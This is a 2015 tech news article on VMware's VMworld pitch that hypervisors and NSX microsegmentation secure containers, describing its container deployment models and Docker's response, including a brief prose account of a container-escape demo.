Networking

VMware’s Appenzeller: Hypervisors Close the Container Security Gap

16 Sep 2015 4:43pm, by

There is an open channel, specifically between a container and the Linux host on which it runs. In a live demonstration at VMworld last September 1, VMware Chief Technology Strategy Officer Guido Appenzeller and network engineer Scott Lowe demonstrated how that link can be exploited maliciously.

Their objective was to demonstrate why hypervisors such as ESX and network virtualization layers such as NSX should not be flushed out of the enterprise, even as they adopt containers into their data centers. VMware’s entire value proposition is leveraged on the hypervisor being the only secure foundation. If customers no longer see this as the case, VMware is in trouble.

Re-containment

When a container runs a web server, it’s capable of running a live PHP script interpreter. Lowe showed a situation where, in running a script whose final command is not properly escaped, he could concatenate chains of arbitrary commands to the tail end of what should have been an ordinary URL. Among the commands Lowe could run was one that downloads and executes a PHP shell in a separate container from any given IP address, without verification (assuming the privilege levels of the container’s host Linux permit it, and with a container running a web server, they very well might).

Lowe could then use another terminal instance to spin up a listener for the new container’s shell. From that terminal, a simple URL call can execute the shell. That shell can be used remotely as a snoop into the Linux system hosting all the containers.

“As long as there are humans developing code, they will introduce vulnerabilities,” explained Appenzeller, as a way of avoiding blaming Docker — a company with which VMware is ostensibly partnering — and distributing responsibility to the species as a whole.

The objective of Appenzeller and Lowe’s demonstration showed how VMware is addressing CIOs with a message that it is premature to be considering containerization in the context of a migration strategy — one that eventually ends with the world of conventional VMs being left behind. In VMware’s view, it is best that containers be absorbed into existing systems, up to the point where they make contact with the infrastructure.

September 2015 model of VMware microsegmentation from VMworld

September 2015 model of VMware microsegmentation, from VMworld

“One of the big differences between containers and virtual machines is that, for containers, they can often share the base operating system,” Appenzeller explained. “I have kernel-level separation between the containers, and they are all using the same operating system. If I’m a CIO, that makes my life a lot easier, because patching, now, has just become a lot easier. I don’t need to patch in five different places anymore; I can do this in one place, and it’s much less effort.”

Appenzeller went on to say VMware has many customers — among them, eBay — that run containers in production on NSX and ESX, even though Docker’s aim from the beginning has been to substitute for hypervisors. And he admitted his first response to this revelation was, “Clearly these guys are doing it wrong. The whole point of containers is not to use hypervisors, but to do this directly on the host.

“It turns out, this actually makes sense, and I think this is the right model for container deployment in the enterprise,” he added.

One Way or the Other

The Appenzeller model for container/VM hybridization, as history may one day refer to it, is not the only model VMware is advancing as an alternative to an all-container universe — not even the only one being shown at the same conference.

Microsegmentation is VMware’s original hybrid deployment model for containers, as first described some months back by Appenzeller. Sometimes hyphenated and sometimes not, it describes one of the services introduced by the NSX network layer: a partitioning of virtualized environments into their own sandboxes.

In a typical vSphere environment, containers become segmented (VMware’s concept of an extra layer of isolation) by virtue of being hosted within single VMs. This virtue was praised during the presentation by eBay’s senior director for cloud engineering, Suneet Nandwani.

First, Nandwani told the audience that the chief attraction of containers for eBay was the ability to orchestrate applications using Kubernetes. He also said that eBay was a charter NSX customer. Although no one stated this outright on stage, one can draw the conclusion that eBay is using NSX microsegmentation to produce sandboxes, of a sort, that can be orchestrated with Kubernetes. Nandwani did not say whether eBay had to use multiple instances of Kubernetes (which would go against the whole point of orchestration), though it’s hopeful that it uses a single orchestrator.

However orchestration works, Nandwani explained, eBay uses NSX to create a private network for all endpoints claimed by containers, thus confining the scope of an otherwise unmanageable storm of IP addresses to a manageable chunk. Conceivably, eBay might have Weave’s private networking scheme instead, and deployed its containers on bare metal, or in a cloud (perhaps even a federated cloud cluster), without VMs.

One Way or the Other

Elsewhere at VMworld that same week, VMware introduced two new and different container deployment models, both of which could be considered alternatives to the eBay model — alternatives that bring more VMware technology into the mix.

“Model 2,” I’ll call it, is the vSphere Integrated Containers model. Here, each individual container is wrapped within a thin VM shell (like an M&M), giving it just enough of VM’s structure to be treated like a VM by NSX and the vSphere management layer. These re-wrapped containers then become hosted by an amended vSphere infrastructure, which portrays the role of the Linux operating system. The container “thinks” it’s being hosted by Linux, when it’s not.

“VSphere Integrated Containers takes one of the most fundamental and valuable precepts of virtualization and applies it to containers,” wrote VMware senior engineer Ben Corrie last August 31. “I like to call it ‘exploding the Linux container host.’”

Corrie draws a fantastic picture of a dynamic environment whose containers may be hosted by any part of vSphere that happens to be hosting a cluster, whatever its size. It’s a picture that resembles babysitting more than hosting, passing off the babies to whatever reliable adults happen to be free at the moment.

“Model 3” was introduced literally within minutes of “Model 2.”  In this third and most radical alternative, VMware’s Photon Platform actually does replace existing VM infrastructure with an underlying layer called “Photon Machine,” that incorporates most of the technology of ESX hypervisors — in this incarnation, redubbed “microvisors.” This opens the possibility of a kind of coupling in reverse: encapsulating VMs within containers, so long as they included a mechanism for relying upon the Photon Machine layer as though it were the hypervisor.

VMware’s intention is to work with sister company Pivotal to deliver Photon Platform as a container delivery system for Cloud Foundry — one that customers could end up perceiving as the de facto system for that platform.

VMware co-CTO Kit Colbert distinguished the two new models from one another in a press announcement during VMworld: “With vSphere Integrated Containers, customers can easily extend their existing vSphere environments to run container-based applications alongside their traditional apps. For customers building large SaaS apps or other massively distributed apps and looking at greenfield data center architectures, Photon Platform provides all the benefits of a mature and secure hypervisor core with a scalable, distributed and multi-tenant control plane.”

Both of these new models inject VMware-specific technology into the container mix: a little piece of code somewhere (either the “jeVM” candy coating for Model 1, or Photon OS for Model 2) that could end up “flavorizing” containers in public distribution — something that Docker Inc. has said in the past it does not want.

“Model 1,” as Appenzeller explains it, would not inject more VMware technology into containers. Instead, it relies on enterprises’ willingness to continue relying upon NSX as what he calls a stateful firewall, enclosing containers within a restricted environment, and effectively containing the damage caused by malicious incursion.

Furthermore, the CTSO said, the NSX layer could be leveraged to enforce rules that prevent containers from communicating with one another on designated ports. This sets up an environment that leaves the hypervisor where it’s always been, relying upon it to give containers the security that Docker’s security team claimed they had from the beginning.

In an interview with The New Stack for an upcoming @ Scale podcast in October, Docker Senior Vice President for Product Scott Johnston says that any one of these VM integration models may be necessary for enterprises to be able to utilize containers to any degree.

At DockerCon in June, Docker introduced developers to Notary, its open source system for certifying the validity of the sources of Docker images pushed to public repositories and encrypting the contents of those images. In August, the company released its own branded implementation of Notary, called Docker Content Trust.

Docker’s aim is to deploy a signing and encryption system that’s so reliable on both the sending and receiving ends of the network, that the security of the network in-between is no longer an issue. Here’s what Docker Security Lead Diogo Mónica said in an interview with The New Stack:

“One thing that we’re gaining is that we do not need to rely on any trusted means of communication for this content to be downloaded and verified securely by the final Docker user. This is essentially a huge guarantee now that we’re providing, that was not being provided before.”

Anyway You Want It

Docker’s stance is to be infrastructure-agnostic and cognizant about the investments organizations have made.

“There are a number of users, particularly in the enterprise IT space, that have made significant investments in their VM plant,” says Johnston.

“They have not just technology, but automation tools that they’ve built internally, perhaps, or purchased from other vendors. They have human capital that is extremely valuable, and has been trained and grown over time, and [they have] the stacks to support that infrastructure. Very importantly, that infrastructure has gone through compliance reviews and security reviews, and has received a number of government approvals, depending on the industry and regulatory environment.

“You look at all of that investment in your infrastructure plant,” he continues, “and as a user, you would ask yourself, ‘Can I reuse this for these new Docker container workloads?’ Of course our answer — because we’re infrastructure-agnostic — is yes, absolutely. If you trust that VM, you trust that compliance review, you trust the processes that you’ve established around your VM infrastructure, outstanding. All we need is a modern Linux kernel, and a standard, modern infrastructure, and we can run these Docker-containerized workloads.”

Johnston stopped short of declaring whether VMware’s vSphere integration scheme would serve as a fair substitute for that modern Linux kernel.

For now, in an effort to hold the ground it’s already won in data centers, VMware is taking the “Oscar Madison approach” to testing alternatives to Docker containerization: throwing everything against the wall to see what sticks.

“I can promise you, it will be awhile before you’re fully containerized,” remarked Appenzeller. “There’s a lot of integration work that needs to be done here.”

Docker, Pivotal, VMware and Weaveworks are sponsors of The New Stack.

Feature image: “segmented faces” by juxtapose^esopatxuj is licensed under CC BY-SA 2.0.

A newsletter digest of the week’s most important stories & analyses.